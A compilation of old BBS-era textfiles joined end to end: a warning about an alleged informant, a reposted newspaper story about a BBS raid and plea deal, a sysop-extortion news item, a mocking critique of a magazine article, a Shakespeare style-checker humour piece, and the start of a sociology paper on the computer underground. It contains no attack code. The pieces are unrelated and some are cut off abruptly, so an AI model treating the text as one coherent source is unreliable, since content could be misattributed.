calls on his own private PBX system, provided you give him YOUR phone number),
and generally will use anything you say to him against you in the future.  Our
advice is simple:  stay the hell away fromthis person.	Even if you haven't
done anything wrong yourself, your life can still be made miserable by him if
you're even suspected of having contact with wrongdoers.

   This latest turn of events has saddened us -- we thought Cable Pair would
be a promising contributor to this publication and instead we learned a
valuable lesson:  don't trust anybody.  Have fun, Cable Pair.  Enjoy yourself.
Just don't expect to see any of us over at the Chestnut Tree Cafe with you.
You're on your own now.  <>

SF][G8:ba003.010185

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]

-----End of File
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
  Newsgroup: news.admin.policy
 Message-ID: <C4DGxH.3H7@redpoll.neoucom.edu>
    Subject: Akron Beacon Journal Story about Munroe Falls BBS

Fellow USENET news administrators,

     The following is a front page story published in the Akron Beacon
Journal on, Monday Mar. 22, 1993, under the byline of Charlene Nevada,
Beacon Journal staff writer.  This story is copyrighted by the Akron
Beacon Journal, and commercial use or resale of this information is
forbidden.  Permission to post this story to USENET has been generously
granted by Mr. Stewart Warner, Deputy Managing Editor.

     I also talked with Charlene Nevada, court reporter, and she
approved my request to post the story, so long as her editor agreed.

     If you appreciate the story and permissions, you may snail-mail
c/o Akron Beacon Journal, P.O. Box 640, Akron, Ohio 44309-0640, USA to
express your thanks.

     The agreement is that I post the story "in full" -- no selective
editing.

     Typographical errors, etc. are mine.  Watch out for double
"d"s... redpoll has a sticky "d" key.

Dick
=-=-=-=-=-=-=-= begin copyrighted story =-=-=-=-=-=-=-=
(front page - page A1)
Headline:  Police say they were taking a byte out of crime

subhead:  * Munroe Falls man was arrested for having X-rated pictures
on his computer bulletin board; his parents believe the sting operation
was politically motivated

BY CHARLENE NEVADA
Beacon Journal staff writer

     When the police cars pulled up to David Lehrer's quiet Munroe
Falls street last June, it was a little like they were swooping down
on a major criminal.

     Police Chief Steve Stahl went to the door and told Lehrer that he
had a search warrant to seize computer equipment belonging to Lehrer's
son, Mark.  The chief told the elder Lehrer that there was reason to
believe Mark Lehrer, then 22, was using the computer and a modem to
disseminate matter harmful to juveniles.

     Essentially, the chief said, it appeared that there were dirty
pictures on a popular computer bulletin board operated by the younger
Lehrer and that teenagers could use their own computers to view the
dirty pictures.

     The police went through the Lehrers' home -- seizing, labeling
and photographing anything and everything that fit on the computer.
It was just like on a police television show, only it was happening in
Munroe Falls and the accused was a college student computer whiz.

     Greg Lehrer, Mark's younger brother, remembers asking one of
the officers:  ``Why don't you go

See COMPUTER, Page A4

(page A4)

(four column photograph - LEW STAMP/Beacon Journal)
Legend:  David Lehrer (left) and his son Mark question why Munroe
Falls police targeted Mark's computer bulletin board, the Akron
Anomaly.

Headline:  COMPUTER
subhead: * Lehrer received no jail time, no probation and a small
fine, but had to give up his beloved home computer

Continued from Page A1

out and find some real criminals?''

     That was nine months ago.

     Some might still ask that question.

     The case of the State of Ohio vs. Mark Lehrer was closed last
week when Lehrer stood before a judge in Summit County and pleaded
guilty to one rather strange misdemeanor: attempted possession of a
criminal tool.

     Lehrer and his family said the plea bargain was a way to put the
matter behind them without risking a jury trial and more legal
expenses.  They consider the whole episode a witch hunt by Munroe
Falls police.

     David Lehrer has said from the beginning that Munroe Falls police
only wanted to appropriate his son's high-powered computer -- which
they labeled a criminal tool -- for their own use.

     Within the computing community, the case caused so much outrage
that some lawyers and accountants set up a defense fund to help
Lehrer.  More than $1,500 came from all over the country.

     Munroe Falls Police Chief Stahl is about as unhappy over the
resolution as the Lehrers.

     Stahl wanted a felony conviction.  The chief denied being on a
witch hunt for criminals in a relatively crime-free suburban
community.

     Lehrer's attorney, Don Varian, said the prosecutor offered to
plea bargain because prosecutors would have had problems going to
trial:  ``They would have lost and they knew it,'' he said.

     On this much everyone agrees: Between last June and last week,
the case took lots of strange turns.

_The Akron Anomaly_

     It started one day last spring when Munroe Falls police got a tip
from a Kent State University student who said he was concerned that
obscene material was available to juveniles through a computer
bulletin board known as the Akron Anomaly.

     The Akron Anomaly was the baby of Mark Lehrer, a University of
Akron student.  Lehrer has been into computers since he was in grade
school and his dad brought the first one home.  Among people who love
computers, bulletin boards are a way to share ideas and programs.
Bulletin board users are a little like yesterday's ham radio
operators.

     The operator of a computer bulletin board is usually someone who
has lots of games, pictures and programs to share.

     Others can sign onto their own computers -- and with the aid of
a modem and telephone line -- tap into the bulletin board and copy the
files.

     As computers go, Lehrer had a V-8 engine, a 486 IBM clone with
500 megabytes of memory.  (The whole Bible could be stored in 1 1/2 of
those megabytes.)

     Lehrer works at a computer store in Stark County.  He was allowed
to buy accessories and upgrades at discount.  His system -- not
including discs -- was valued at about $3,000.

     The bulletin board was so successful that early last year a local
computer group called it one of the best around.

     Those who wanted to use the bulletin board more than 45 minutes
a day were asked to pay $15 a year, which Lehrer applied to his phone
bill.

_X-rated material_

     The board had an adult section with X-rated pictures and movies.
Those who wanted access to the adult section had to send Lehrer a
copy of a drivers's license and get a special clearance.

     Computer users don't just take things from a bulletin board.
They contribute, too.

     Programs and pictures sent to the Anomaly were received in sort
of an ``in'' basket.  Lehrer then sorted them and filed them by category.

     The X-rated stuff -- which Lehrer said was less than 2 percent of
the available files -- was put into the restricted-entry adult
category.  According to Stahl, some of the X-rated files wound up in
the clean section.

     One in particular troubled Stahl.  It was labeled ``69'', a slang
term for oral sex, and had thre X's behind it.

     To Stahl, that meant dirty.  And since it wasn't in a
restricted-access section, anyone could see it.

     But since Munroe Falls didn't actually have any outraged parents
complaining, the police set up a sting operation.

     Working on the advice of prosecutors from the Cuyahoga Falls
Municipal Court, police found a 15-year-old volunteer and had him
apply for membership under a fake name.  They sat him down at a
computer and had him press the button to access one of the X-rated
files.  Then he left because his parents didn't want him viewing the
material.

     Lehrer was charged with disseminating matter harmful to juveniles
and possession of criminal tool -- his computer.

     At a preliminary hearing last June, Cuyahoga Falls Municipal
Judge James Bierce warned that more evidence would be needed to
convict Lehrer.  Nonetheless, the matter was bound over to the grand
jury.

     And that's where it died.  Just why isn't clear.  Grand jury
proceedings are secret.

     Stahl said the grand jury didn't actually get to see the
pictures.

     Varian has his own theory.

     The police didn't have an independent witnesses saying they or
their children were offended,  Varian said.  All they had was the
15-year-old kid who was set up.  That meant the jury would have had to
look at the issue of entrapment.  Jurors might not have liked that.

_New charges_

     But the matter didn't end with the grand jury no-billing the
issue of disseminating matter harmful to juveniles.

     New charges surfaced.

     When authorities seized Lehrer's computer, they also took those
shopping bags full of floppy discs.  And apparently among them were
some sex pictures in which the subjects cound have been under 18.

     So Lehrer was indicted for pandering obscenity involving minors.

     It didn't matter that the pictures came from a disc and weren't
on line or available through the bulletin board.

     The new charges made David Lehrer, Mark's father, suspect even
more that there was a hidden agenda.

_Politics at work?_

     Lehrer chairs the city's charter review commission.  Last May,
the commission voted not to make the police chief's job classified,
which would have offered Stahl a great measure of job protection.

     Plus, after the bust, Susan Lehrer -- Mark's mother -- visited
the chief.  She took notes.  She said Stahl talked about how her son's
computer could be used in police work.

     Stahl denied his actions were politically motivated.  He also
denied wanting to get the computer, which is now in the hands of state
law enforcement officials.

     The chief said he decided it would be wrong to ignore the case
just because Mark Lehrer's father held a public position.

     Stahl denied digging through the floppies to find more to charge
Lehrer with.  The Bureau of Criminal Investigation dit that, he said.

_Computer gone for good_

     Mark Lehrer acknowledged having some adult files in the
unrestricted area.  With 10,000 files to deal with, he said, it was a
clerical error.

     Summit County Prosecutor Lynn Slaby said that it would have been
tough to convict Lehrer on the kiddie porn charges because proving the
ages of the people in the pictures would have been tough.  Varian said
the women looked in the range of 16 to 20.

     To salvage the case, prosecutors offered the plea bargain.

     Lehrer said he agreed to it because expert witnesses -- people to
testify the people in the picture weren't under 18 -- would have cost
$6,000.

     Most importantly, he said:  ``I didn't want to go to trial for
child pornography.  Juries sometimes convict people unfairly.''

     He got no jail time, no probation and a small fine.  But he had
to give up his computer.

     ``We did not endorse the plea agreement,'' Stahl said.  He said
he still believes that Lehrer is guilty of disseminating matter
harmful to juveniles.

     The chief said he isn't on an obscenity crusade.  ``We're not
Ravenna,'' he said, referring to that city's anti-porn-crusading
mayor, Donald Kainrad.

     To Lehrer -- who sees an empty room instead of a sophisticated
computer -- it's been a nightmare and the end of a great hobby.

     ``Being hit with child pornography charges'' was far from just, he
says.  ``It's scary what people -- police and prosecuters -- can do to
a citizen.''

=-=-=-=-=-=-=-= end copyrighted story =-=-=-=-=-=-=-=

Please be careful out there.
Dick
--
Richard E. Depew, Munroe Falls, OH    red@redpoll.neoucom.edu (home)
"...plug the RS-232 connector on the back side of the Mini Modem 2400 into
the RS-232 connector on your computer, then screw up." - modem instructions
---
 * PCB/UseNet Gateway from Sparkware #3


HEADER:USENET

Path: channel1!uupsi!psinntp!uunet!gatech!usenet.ins.cwru.edu!news.uakron.edu!neoucom.edu!redpoll!red
From: red@redpoll.neoucom.edu (Richard E. Depew)
Newsgroups: akr.newsadmin,cle.general,oh.general,comp.org.eff.talk,news.admin.policy
Subject: Akron Beacon Journal Story about Munroe Falls BBS
Summary: plead guilty to attempted possession of a criminal tool
Keywords: obscenity, entrapment, pandering, backups
Message-ID: <C4DGxH.3H7@redpoll.neoucom.edu>
Date: Wed, 24 Mar 1993 02:44:04 GMT
Followup-To: news.admin.policy
Organization: Home, in Munroe Falls, OH
Lines: 285

TWO JUVENILES ARRESTED IN BBS EXTORTION CASE

  (April 26)
  Two 15-year-olds have been arrested by California authorities on charges
they made death threats and tried to extort money from at least three computer
bulletin board operators.
  As reported in Online Today yesterday, Encino, Calif., BBS sysop John Sands
went to police after receiving demands for money and threats on his life in
messages left on his board in March and the first part of this month.
  Police now say that the two suspects -- both reportedly sophomores at Seaside
High School near Monterey, Calif. -- also are accused of making similar
computerized threats on a Fort Ord-based Army staff sergeant and his teen-age
son, and on another student at a private high school in the Pebble Beach,
Calif., area.
  The juveniles were arrested at their homes in Marina by investigators who
seized computer equipment allegedly used to transmit the threats, according to
United Press International reporter Michael D. Harris.
  Authorities say the teen-agers, who allegedly demanded payments ranging from
$50 to $350 from at least the three BBS sysops identified, were turned over to
their parents while authorities decide how and where they should be prosecuted.
  The case came to light yesterday after reports surfaced that legal complaints
had been filed by Sands, who is the chief electronics engineer for Capitol
Records. Sands, 43, said the visitors to his private BBS demanded $350 from him
and threatened violence if he didn't pay.
  The computer message instructed Sands to leave the money at a drop site in
San Jose. During the investigation, Los Angeles police prepared a phony drop
but never carried it out because they susequently received tips that led them
to the youths, said police Lt. Fred Reno.
  Following the arrests, Sands told Harris, "It was a little scary because even
though I suspected they were juveniles, I felt they were probably capable of
carrying out their threats. I%m sorry to see any young person get in trouble,
but I'm relieved that they were arrested."
  Meanwhile, according to Judy Smagula Farah of the Associated Press, the
youths and Sands once belonged to the same computer club and used a code that
gave them access to Sands' bulletin board.
   Reno said that if the suspects decide to plead guilty to the likely charges
of accessing a computer system to extort money, their sentencing will occur in
Monterey County. If they decide to fight the charges, the case -- the first of
its kind in Los Angeles County -- will be prosecuted in Southern California.
	/------------------------------------------------------------\
      / 	       Ascii and you shall recieve		       \
    /		   Analysis of an average Computer article		 \
=-=/			    By The Slipped Disk 			  \ =-=
=-=\									  / =-=
    \	 Directed By The Slipped Disk	  Produced By The Slipped Disk	 /
      \   Pirates Chest.............................1-617-891-1349     /
	\------------------------------------------------------------/

   I was leafing through the june issue of Computer Entertainment (It was
Electronic Games until May) when I noticed an article about the nation's
bulletin boards called "Ascii and you shall Recieve". The title was stupid, but
I thought "What the hell? Can't hurt." It did. It was boring, and there was so
much that I thought about saying to the Author, Roger Rapoport, that I was
ready to explode. So I have done the next best thing. I am going to retype the
entire article here. But with one small addition.... My personal comments about
each sentence or group of sentences will follow it or them in squiggly quotes.
(Also known as {}.) This is because he uses the regular Parenthesis and I don't
want to screw it up. So, here it goes.........


			 Ascii and you shall Recieve
		       By Roger Rapoport {What a name.}
		       ================================

  If you've got a computer Modem, {And I know you do,} you probably know that
you can do all sorts of exciting things: Send electronic mail (too bad if your
granmother doesn't have a computer) {Very funny, asshole.}, get the latest
stock market quotes {Everybody talks about that. Nobody does it.}, buy airline
tickets, pay bills. Not very exciting, I know. Then how about tapping {Tapping?
really now.} into the less corporate, "Underground" {Underground? Nice thing to
say about a BBS.} computer bulletin boards that are proliferating around the
country? Through the miracle {Say "Hard work", Roger.} of digital
communication, that very same computer and modem can tell you who killed more
indians than the Lone Ranger {Do you Care?}, why Diskotech and San Leandro High
School in California is believed to be having an Affair with Mr. C-brain
{Again, Who cares?}, and that a nanosecond is the amount of time it takes an
English governess to realize the kids are up to something. {Huh?}





















What if Shakespeare had a computer?
 _____________________________
|                             |
|       Bard Bytes Dust       |
|            By:              |
|       Charles Burress       |
|                             |
|           From:             |
|                             |
| The San Francisco Chronicle |
|Sunday, April 20th, MCMLXXXVI|
|                             |
|         Typed in by:        |
|                             |
|       The Unknown User      |
|_____________________________|

          ("Why", you may  ask, "in the
world  would  someone  type   something
straight in from the  newspaper?".  The
answer  is:   Because  I  find  this an
interesting  and   funny  article,  and
thought that some people that don't get
the Chronicle might want to read it. By
the way,  this was typed in on the 21st
of  April,  but is  yesterday's paper.)

          (Note: Anything in ALL UPPER-
CASE  was in  italics  in the article.)

         Shakespeare's greatest tragedy
wasn't  HAMLET.  It  was  not  having a
computer.    Computers have come a long
way since the  Stone Age  of the micro-
chip  20 years ago, when they were used
for  such  raw  displays of brute tech-
nology as hurling men to the moon.  To-
day,  the  computer  is  a  creature of
sophisticated finesse, shooting for the
moons  of  the  mind.   One result is a
revolution  in  the  art  of writing, a
transformation  unmatched since perhaps
adverbs first emerged from  pre-lingual
ooze.  The  breakthrough  consists of a
masterpiece of word-processing software
known modestly as a style-checker. Like
a jeweler's lens, it can reveal a seem-
ingly  perfect  gem of  writing to be a
rough-hewn landscape of blemishes.  You
put  in  the  prose, the computer spits
out  the  mistakes.   But  its crowning
achievement  is  the  next  step:    It
composes  improvements.  This brave new
world,  however,  has not been tempest-
free.  While style checkers are winning
friends  on  campuses  and  in offices,
they have met  stubborn resistance from
the  battlements of literature.  Indig-
nation  still simmers  over what a Bell
Laboratories  style-checker  did to the
Gettysburg  Address a couple  of  years
back.  Lincoln's first sentence:  FOUR-
SCORE  AND  SEVEN  YEARS AGO, OUR FORE-
FATHERS  BROUGHT  FORTH UPON THIS CONT-
INENT  A  NEW   NATION,   CONCEIVED  IN
LIBERTY AND DEDICATED  TO THE PROPOSIT-
ION THAT  ALL  MEN ARE  CREATED EQUAL -
was  improved  to  read:   EIGHTY-SEVEN
YEARS AGO,  OUR  GRANDFATHERS CREATED A
FREE NATION  HERE.   With Lincoln, how-
ever,  the   style-checkers  were  just
flexing their  cursors.  They were pre-
paring the  eventual assault on the Mt.
Everest of  literature  -  Shakespeare.
That sublime peak  was claimed recently
when a  Berkeley  scientist revealed he
had  successfully  trained his computer
to  sniff out  Shakespeare's flaws. Dr.
C. J. Wallia -  a  Stanford  Ph.D.  and
consultant in electronic publications -
turned  his  customized   style-checker
loose on  Hamlet's "To be or not to be"
soliloquy. Their computer coughed up 34
errors,  found the  language "obsolete"
and  "overwritten,"  and  gave  this 15
word alternative:  IS IT BETTER TO LIVE
WITH  BAD  LUCK OR  END IT ALL AND HAVE
NIGHTMARES. There we have it, the high-
water mark  of the  computer as a young
artist.   But were Shakespeare's lovers
grateful?  "I think it's hideous"  said
Jerry Turner,  artistic director of the
Oregon Shakespearean Festival,  the 50-
year-old  company  that  has  performed
more  Shakespeare for  more people than
any theater in America.  "It's absurd,"
he added.  "Shakespeare's  work  is the
standard of the  best  literature there
is.  Any  attempt to  say it can be im-
proved is presumptuous."   Turner's not
alone.  A  chorus  of  ridicule greeted
Wallia's effort.  But let us not be too
hasty to join the herd.  There's little
profit  in  literary  lemminghood.   If
truth be told, the glare of the fame of
Shakespeare  often  blinds  us  to  his
actual merit. When someone says "Shake-
speare," we  genuflect  from habit.  To
praise  Shakespeare  or  to  bury him -
that is not the question. The issue is,
no matter how great Shakespeare is, can
he be improved by computer?  If so, the
world  has   suffered  an  immeasurable
tragedy.    Millions  of  readers  died
knowing only a  Shakespeare who did not
fulfill all his potential  -  a stunted
Shakespeare.   Our  highest standard of
literature  has  been but a poor shadow
of  what  it  could be.  In short,  the
crown jewels  of  writing are riding on
Wallia's experiment. Let us then remove
the  literary  chastity  belts from our
minds and consider the possibility that
Shakespeare was not perfect. It's help-
ful to  recall that  other  Elisabethan
giant, Ben Jonson, one of Shakespeare's
ardent but not fawning admirers. Jonson
wrote: THE PLAYERS HAVE OFTEN MENTIONED
IT AS AN HONOR TO SHAKESPEARE,  THAT IN
HIS WRITING HE NEVER BLOTTED OUT A LINE
MY  ANSWER  HATH  BEEN,  "WOULD  HE HAD
BLOTTED A THOUSAND."   Such a view,  of
course, is merely a generaliztion.  The
real  test  must be to examine the text
itself.   This means casting an uncowed
eye on the  Hamlet  speech, as composed
without a computer:  TO BE OR NOT TO BE
- THAT IS THE QUESTION. Already we have
a problem.  "To be or not to be" is not
a  question.   But  let's  not  quibble
Hamlet  is clearly  torn between living
and dying - or at least it appears that
way until the second sentence:  WHETHER
'TIS  NOBLER IN THE  MIND TO SUFFER THE
SLINGS AND ARROWS OF OUTRAGEOUS FORTUNE
OR  TO  TAKE  ARMS  AGAINST  A  SEA  OF
TROUBLES AND BY OPPOSING END THEM.  Let
us ignore  the  metaphoric  indigestion
of taking arms against a sea.  Here the
choice  that divides Hamlet is not life
or  death,  but  passive  suffering vs.
active opposition.   We naturally go to
the  third  sentence  to find out  what
Hamlet's  talking  about,  and run into
this: TO DIE, TO SLEEP  -  NO MORE, AND
BY A SLEEP TO SAY WE  END THE HEARTACHE
AND THE  THOUSAND  NATURAL  SHOCKS THAT
FLESH IS HEIR TO.  Now he's back on the
death trip.  No  wonder  Hamlet's conf-
used.  On top of that, this sentence is
not a sentence but a  fragment  without
proper subject and verb, and thus not a
complete thought.  Moreover, try saying
it out loud. It hardly rolls trippingly
on the tongue. From there it's downhill
at a gallop. We hit a  BODKIN  and some
FARDELS  and  phrases  like  THE SPURNS
THAT  PATIENT  MERIT  OF  THE  UNWORTHY
TAKES,  and  other  such stuff as head-
aches  are  made  on.   One can rummage
through the play  and find numerous ex-
amples  of  that  country   from  whose
bourne no comprehension  returns.  Here
is a typical  Hamlet  remark from later
in Act III: LET THE GALLED JADE  WINCE,
OUR WITHERS ARE  UNWRUNG.   The meaning
of this  sentence  may  not leap out at
first  glance.   Luckily,  we  have the
footnote in Professor  G. B. Harrison's
widely  used  tome,  "Shakespeare:  The
Complete  Works."   The sentence trans-
lates:  "Let a  nag  with a  sore  back
flinch  when the saddle is put on;  our
shoulders feel no pain."   This example
makes one thing  clear:  society owes a
large debt to  Shakespearean  scholars,
who have kept the old  Bard afloat on a
sea  of  footnotes.   Think of Wallia's
computer as Galileo's telescope.  First
comes the shock of heresy. Then accept-
ance of  Shakespeare's  not  being  the
center of the literary universe.Finally
we enjoy the discovery's benefits.  For
example, if Hamlet's 265-word soliloquy
can  be  trimmed to  15 words, then the
same rate of improvement can reduce the
entire 4 hour play to a 1980s size bite
of culture - 14 minutes.  Add drums and
electric  strings, and  imagine  Shake-
speare  born  anew  for  today's world:
HAMLET,  THE  ROCK VIDEO.   Call Shake-
speare a casualty of progress,  a moldy
scribbler,  an  emperor unclothed - but
do not call him to account. He's not to
blame.  How  could  he  have  known our
vocabulary  and  attention  spans would
become  much  slimmer  thanks thanks to
the quick-thrill diet of  modern enter-
tainment?  The fault,  dear William, is
not in ourselves,  but  in  our stars -
Joan Collins, Mr. T, Boy George...
=======================================
And if you enjoyed this TextFile,  call
  The Works  -  914's Textfile BBS.
      (914)-238-8195 24 Hrs.
      900+ Textfiles Online 
      300/1200 Baud, N,8,1.         
      Home of Terror Ferret
      10 Megabytes of Storage      
      ANSI Graphics Optional
=======================================
Thanks to Arnie (and the Republique)
======================================= 
 
 
                         THE BAUDY WORLD OF THE BYTE BANDIT:
             A POSTMODERNIST INTERPRETATION OF THE COMPUTER UNDERGROUND
 
 
                               Gordon Meyer and Jim Thomas
                               Department of Sociology
                            Northern Illinois University
                                  DeKalb, IL 60115
                                   (10 June, 1990)
 
 
 
 
 
 
          Forthcoming in In F.  Schmalleger (ed.),  Computers in Criminal
          Justice, Bristol (Ind.):  Wyndham Hall.   An earlier version of
          this paper was presented at  the American Society of Criminology
          annual meetings, Reno (November 9, 1989).   Authors are listed in
          alphabetical order.  Address correspondence to Jim Thomas.
          We are indebted  to the numerous anonymous  computer underground
          participants who provided  information.  Special acknowledgement
          goes to Hatchet Molly, Jedi, The Mentor,  Knight Lightning,  and
          Taran King.
 
 
 
 
                         THE BAUDY WORLD OF THE BYTE BANDIT:
             A POSTMODERNIST INTERPRETATION OF THE COMPUTER UNDERGROUND
               Hackers are "nothing more  than high-tech street gangs"
               (Federal Prosecutor, Chicago).
 
               Transgression is not immoral. Quite to the contrary, it
               reconciles the law with what it forbids; it is the dia-
               lectical game of good and evil (Baudrillard, 1987: 81).
               There ain't no sin and there ain't no virtue.  There's
               just stuff people do.   It's all part of the nice, but
               that's as far as any man got a right to say (Steinbeck,
               1939:31-32).
 
               The criminalization of "deviant acts" transforms and reduces
          broader social meanings to legal ones.  Once a category of behav-
          iors has become defined by statute as sanctionably deviant,  the
          behaviors so-defined assume  a new set of meanings  that may ob-
          scure ones  possessed by those  who engage in  such behaviors.
          "Computer deviants" provide one example.
               The proliferation of computer  technology has been accompa-
          nied by the growth of a computer underground (CU),  often mistak-
          enly labeled "hackers," that is  perceived as criminally deviant
          by the media, law enforcement officials, and researchers.   Draw-
          ing from ethnographic data,  we offer  a cultural rather than a
          criminological analysis of the underground by suggesting that the
          CU reflects an attempt to recast, re-appropriate, and reconstruct
          the power-knowledge relationship that  increasingly dominates the
 
                                        - 1 -
 
 
          ideology and actions of modern society.  Our data reveal the com-
          puter underground as  an invisible community with  a complex and
          interconnected cultural lifestyle, an inchoate anti-authoritarian
          political consciousness,  and dependent on norms of reciprocity,
          sophisticated socialization  rituals,  networks  of information
          sharing, and an explicit value system.   We interpret the CU cul-
          ture as a challenge to and parody of conventional culture,  as a
          playful attempt to reject the seriousness of technocracy,  and as
          an ironic substitution of rational  technological control of the
          present for an anarchic and playful future.
                        Stigmatizing the Computer Underground
               The computer underground refers to persons engaged in one or
          more of several activities, including pirating, anarchy, hacking,
          and phreaking[1].    Because computer  underground participants
          freely share information and often are involved collectively in a
          single incident,  media definitions invoke the generalized meta-
          phors of  "conspiracies" and "criminal rings,"  (e.g.,  Camper,
          1989;  Computer Hacker Ring, 1990;  Zablit, 1989), "modem macho"
          evil-doers (Bloombecker, 1988),  moral bankruptcy (E.  Schwartz,
          1988), "electronic trespassers" (Parker: 1983), "crazy kids dedi-
          cated to making mischief" (Sandza, 1984a:  17), "electronic van-
          dals" (Bequai:  1987), a new or global "threat" (Markoff, 1990a;
          Van,  1989),  saboteurs ("Computer Sabateur," 1988),  monsters
          (Stoll, 1989:  323), secret societies of criminals (WMAQ, 1990),
          "'malevolent, nasty, evil-doers' who 'fill the screens of amateur
          {computer} users with pornography'"  (Minister of Parliament Emma
 
                                        - 2 -
 
 
          Nicholson, cited in "Civil Liberties," 1990:  27), "varmints" and
          "bastards" (Stoll,  1989:  257),  and "high-tech street gangs"
          ("Hacker, 18," 1989).  Stoll (cited in J. Schwartz, 1990: 50) has
          even compared them to persons who  put razorblades in the sand at
          beaches, a bloody, but hardly accurate, analogy.   Most dramatic
          is Rosenblatt's (1990:  37) attempt to link hackers to pedophilia
          and "snuff films," a ploy clearly designed to inflame rather than
          educate.
               These images have prompted calls  for community and law en-
          forcement vigilance (Conly and McEwen, 1990:  2;  Conly,  1989;
          McEwen, 1989).   and for application of the Racketeer Influenced
          and Corrupt Organizations (RICO) Act to prosecute and control the
          "criminals" (Cooley, 1984),  which have created considerable con-
          cern for civil liberties (Markoff, 1990b;  J.  Schwartz, 1990).
          Such exaggerated discourse also fails  to distinguish between un-
          derground "hobbyists," who may infringe  on legal norms but have
          no intention of pillaging,  from  felonious predators,  who use
          technology to loot[2].   Such terminology creates a common stock
          of public knowledge that formats  interpretations of CU activity
          in ways pre-patterned as requiring  social control to protect the
          commonweal (e.g., Altheide, 1985).
               As Hollinger and Lanza-Kaduce (1988:  119), Kane (1989), and
          Pfuhl (1987) observed,  the stigmatization of hackers has emerged
          primarily through value-laden media depictions.   When in 1988 a
          Cornell University graduate student inadvertently infected an in-
          ternational computer network by  planting a self-reproducing "vi-
 
                                        - 3 -
 
 
          rus," or "rogue program," the news  media followed the story with
          considerable detail about  the dangers of computer  abuse (e.g.,
          Allman, 1990; Winter, 1988).  Five years earlier, in May of 1983,
          a group of hackers known as  "The 414's" received equal media at-
          tention when they  broke into the computer system  of the Sloan
          Kettering Cancer research center.   Between these dramatic and a-
          typical events, the media have dramatized the dangers of computer
          renegades,  and media anecdotes  presented during Congressional
          legislative debates  to curtail "computer abuse"  dramatized the
          "computer hacking problem" (Hollinger  and Lanza-Kaduce,  1988:
          107).   Although the accuracy and objectivity of the evidence has
          since been challenged (Hollinger and Lanza-Kaduce 1988: 105), the
          media continue to format CU activity  by suggesting that any com-
          puter-related felony can be attributed to hacking.  Additionally,
          media stories are taken from the accounts of police blotters, se-
          curity personnel, and apprehended hackers, each of whom have dif-
          ferent perspectives and definitions.   This creates a self-rein-
          forcing  imagery in  which  extreme  examples and  cursively
          circulated data are discretely adduced  to substantiate the claim
          of criminality by  those with a vested interest  in creating and
          maintaining such definitions.   For  example,  Conly and McEwen
          (1990)  list examples of law  enforcement jurisdictions in which
          special units to  fight "computer crime," very  broadly defined,
          have been created.  These broad  definitions serve to expand the
          scope of authority and resources of the units.   Nonetheless, de-
          spite criminalization,  there is little  evidence to support the
 
                                        - 4 -
 
 
          contention that computer hacking has been sufficiently abusive or
          pervasive to warrant zealous  prosecution (Michalowski and Pfuhl,
          forthcoming).
               As an antidote to the  conventional meanings of CU activity
          as simply one of deviance,  we shift the social meaning of CU be-
          havior from one of stigma to one of culture creation and meaning.
          Our work is tentative,  in part  because of the lack of previous
          substantive literature and in part  because of the complexity of
          the data, which indicate a multiplicity of subcultures within the
          CU.  This paper examines two distinct CU subcultures, phreaks and
          hackers,  and challenges the Manichean  view that hackers can be
          understood simply as profaners of a sacred moral and economic or-
          der.
                     The Computer Underground and Postmodernism
               The computer underground  is a culture of  persons who call
          computer bulletin board systems (BBSs,  or just "boards"),  and
          share the interests fostered by the BBS.   In conceptualizing the
          computer underground as a distinct culture, we draw from Geertz's
          (1973: 5) definition of culture as a system of meanings that give
          significance to shared  behaviors that must be  interpreted from
          the perspective of those engaged in them.  A culture provides not
          only the "systems of standards for perceiving, believing,  evalu-
          ating, and acting" (Goodenough,  1981:  110),  but includes the
          rules and symbols  of interpretation and discourse  for partici-
          pants:
               In crude relief,  culture can be understood as a set of
               solutions devised by a group of people to meet specific
               problems  posed by  situations  they  face in  com-
                                        - 5 -
 
 
               mon. . . This notion of culture as a living, historical
               product of group problem solving  allows an approach to
               cultural study that is applicable to any group, be it a
               society, a neighborhood, a family, a dance band,  or an
               organization and its segments  (Van Maanen and Barley,
               1985: 33).
               Creating and maintaining a culture requires continuous indi-
          vidual or group processes of  sustaining an identity through the
          coherence gained by a consistent aesthetic point of view, a moral
          conception of self,  and a lifestyle that expresses those concep-
          tions in one's immediate existence and tastes (Bell, 1976:  36).
          These behavioral expressions signify a variety of meanings,  and
          as signifiers they reflect a type of code that can be interpreted
          semiotically,  or as a sign system amenable to readings indepen-
          dent of either participants or of  those imposed by the super-or-
          dinate culture:
               All aspects of culture possess  a semiotic value,  and
               the most  taken-for-granted phenomena can  function as
               signs:   as elements in communication systems governed
               by semantic rules  and codes which are  not themselves
               directly apprehended in experience.   These signs are,
               then,  as opaque as the social relations which produce
               them and which they re-present (Hebdige, 1982: 13).
               It is this symbolic cultural ethos,   by which we mean the
          style, world view, and mood (Hebdige,  1979),  that reflects the
          postmodernist elements of the CU and separates it from modernism.
          Modernist culture  is characterized especially  by rationality,
          technological enhancement, deference to centralized control,  and
          mass communication.   The emergence  of computer technology has
          created dramatic changes in social communication, economic trans-
          actions, and information processing and sharing, while simultane-
          ously introducing new forms of surveillance, social control,  and
 
                                        - 6 -
 
 
          intrusions on privacy (Marx, 1988a: 208-211;  Marx and Reichman,
          1985).  This has contributed to a:
               . . .  richly confused and hugely verbal age, energized
               by a multitude of competing discourses,  the very pro-
               liferation and plasticity of  which increasingly deter-
               mine what we defensively refer  to as our reality (New-
               man, 1985: 15).
               By Postmodernism we mean a reaction against "cultural moder-
          nity" and a destruction of the  constraints of the present "maxi-
          mum security society" (Marx,  1988b)  that reflect an attempt to
          gain control of an alternative future. In the CU world, this con-
          stitutes a conscious resistance to the  domination of but not the
          fact of technological encroachment into  all realms of our social
          existence.  The CU represents a reaction against modernism by of-
          fering an ironic response to the primacy of a master technocratic
          language,  the incursion of computers into realms once considered
          private, the politics of techno-society,  and the sanctity of es-
          tablished civil and state authority.  Postmodernism is character-
          ized not so much by a single  definition as by a number of inter-
          related characteristics, including, but not limited to:
             1.  Dissent for dissent's sake (Lyotard, 1988).
             2.  The collapse of the  hierarchical distinction between mass
                 and popular culture (Featherstone, 1988: 203).
             3.  A stylistic promiscuity favoring  eclecticism and the mix-
                 ing of codes (Featherstone, 1988: 203).
             4.  Parody, pastiche, irony,  playfulness and the celebration
                 of the surface "depthlessness"  of culture (Featherstone,
                 1988: 203).
 
                                        - 7 -
 
 
             5.  The decline of the originality/genius of the artistic pro-
                 ducer and the assumption that  art can only be repetitious
                 (Featherstone 1988: 203).
             6.  The stripping  away of social and  perceptual coordinates
